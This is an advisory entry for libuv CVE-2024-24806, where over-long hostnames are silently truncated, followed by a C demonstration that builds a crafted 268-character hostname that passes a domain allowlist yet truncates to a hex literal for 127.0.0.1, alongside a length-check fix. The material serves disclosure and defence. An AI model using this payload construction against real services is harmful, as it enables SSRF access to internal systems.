
Arash16

#36844 of 53,632
7.5 Total CVSS
Vulnerabilities · 1
PT-2024-2832
7.5
2024-02-07
Libuv · Libuv · CVE-2024-24806
**Name of the Vulnerable Software and Affected Versions**

libuv versions prior to 1.48.0

**Description**

The issue arises from the handling of the `hostname_ascii` buffer (256 bytes) in the `uv_getaddrinfo` function: a hostname longer than 256 characters is silently cut to 256 characters before being passed to `getaddrinfo`, with no error returned to the caller. Because the string that is actually resolved differs from the string the application saw, an attacker can craft a long hostname whose first 256 characters form an address that `getaddrinfo` accepts, so that any validation the developer performed on the full name (for example an allowlist of permitted domains) is bypassed and the lookup resolves to an unintended IP address. This can give an attacker access to internal APIs or expose internal services to Server-Side Request Forgery (SSRF).

**Recommendations**

Upgrade to libuv 1.48.0 or later, which fixes the issue. If upgrading is not immediately possible, reject hostnames longer than 255 bytes (no valid DNS name is longer) before they reach `uv_getaddrinfo`, and apply any allowlist or other check to exactly the string that will be resolved rather than to a longer input.
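The following stand-alone C program is an added illustration of the mechanism described above; it is not libuv code and does not call libuv. It models the pre-1.48.0 behaviour with a 256-byte buffer, runs a hypothetical application-side allowlist check (names under `.example.com`, an assumption for the demo) on a constructed over-long hostname, and shows that the check passes on the full name but the string that would actually reach `getaddrinfo` is something else entirely. The `hardened_precheck` function shows the length rejection a caller can add on versions that cannot be upgraded yet. All function and constant names are this example's own.

```c
#include <arpa/inet.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* 256-byte hostname buffer, matching the size the advisory gives for
 * hostname_ascii in libuv < 1.48.0 (stand-alone model, not libuv's code). */
#define HOSTNAME_ASCII_LEN 256

/* Hypothetical application-side allowlist: only names under .example.com may be resolved. */
static const char ALLOWED_SUFFIX[] = ".example.com";

bool host_is_allowed(const char *host) {
    size_t hl = strlen(host), sl = strlen(ALLOWED_SUFFIX);
    return hl > sl && strcmp(host + (hl - sl), ALLOWED_SUFFIX) == 0;
}

/* Models the pre-1.48.0 behaviour: the name is copied into a fixed 256-byte buffer
 * and silently cut there. `out` receives what getaddrinfo would actually see. */
size_t truncate_like_vulnerable(const char *host, char out[HOSTNAME_ASCII_LEN + 1]) {
    size_t n = strlen(host);
    if (n > HOSTNAME_ASCII_LEN) n = HOSTNAME_ASCII_LEN;
    memcpy(out, host, n);
    out[n] = '\0';          /* terminated here so the demo can print it safely */
    return n;
}

/* Does the C library accept this string as a numeric IPv4 literal (no DNS traffic)?
 * glibc's inet_aton accepts hex forms such as 0x7f000001; other libcs may differ. */
bool parses_as_ipv4_literal(const char *s, char dotted[INET_ADDRSTRLEN]) {
    struct in_addr a;
    if (inet_aton(s, &a) == 0) return false;
    inet_ntop(AF_INET, &a, dotted, INET_ADDRSTRLEN);
    return true;
}

/* Hardened pre-check: refuse anything that cannot fit the buffer (DNS names are capped
 * at 255 bytes anyway) before the allowlist test, so truncation can never happen. */
int hardened_precheck(const char *host) {
    if (strlen(host) > 255) return -1;      /* would be truncated: reject */
    if (!host_is_allowed(host)) return -2;  /* not on the allowlist */
    return 0;
}

/* Constructed payload: "0x", 246 zeros, "7f000001" (exactly 256 chars) followed by
 * ".example.com". The whole string looks like a label under the allowed domain; its
 * first 256 characters are a hex IPv4 literal for 127.0.0.1. Returns the length (268). */
size_t build_payload(char *buf, size_t bufsz) {
    const char prefix[] = "0x", tail[] = "7f000001";
    size_t zeros = HOSTNAME_ASCII_LEN - (sizeof prefix - 1) - (sizeof tail - 1); /* 246 */
    size_t need = HOSTNAME_ASCII_LEN + sizeof ALLOWED_SUFFIX;  /* includes the NUL */
    if (bufsz < need) return 0;
    char *p = buf;
    memcpy(p, prefix, sizeof prefix - 1); p += sizeof prefix - 1;
    memset(p, '0', zeros);                p += zeros;
    memcpy(p, tail, sizeof tail - 1);     p += sizeof tail - 1;
    memcpy(p, ALLOWED_SUFFIX, sizeof ALLOWED_SUFFIX);  /* copies the NUL too */
    return strlen(buf);
}

/* Returns 1 when the allowlist passes on the full name but not on the truncated
 * string that would be resolved, i.e. when the check has been bypassed. */
int demo_bypass(void) {
    char full[512], seen[HOSTNAME_ASCII_LEN + 1];
    size_t len = build_payload(full, sizeof full);
    size_t seen_len = truncate_like_vulnerable(full, seen);
    return len == 268 && seen_len == HOSTNAME_ASCII_LEN &&
           host_is_allowed(full) && !host_is_allowed(seen);
}

int main(void) {
    char full[512], seen[HOSTNAME_ASCII_LEN + 1], dotted[INET_ADDRSTRLEN];
    size_t len = build_payload(full, sizeof full);
    printf("input length %zu, allowlist on full name: %s\n", len,
           host_is_allowed(full) ? "pass" : "fail");
    size_t seen_len = truncate_like_vulnerable(full, seen);
    printf("%zu bytes reach getaddrinfo, allowlist on those: %s\n", seen_len,
           host_is_allowed(seen) ? "pass" : "fail");
    if (parses_as_ipv4_literal(seen, dotted))
        printf("truncated name is accepted as the numeric address %s\n", dotted);
    printf("hardened pre-check on the payload: %d\n", hardened_precheck(full));
    return 0;
}
```

The length check in `hardened_precheck` is the piece worth copying: it runs before the allowlist, on the same string the application is about to resolve, so a name that would be truncated never gets as far as a lookup.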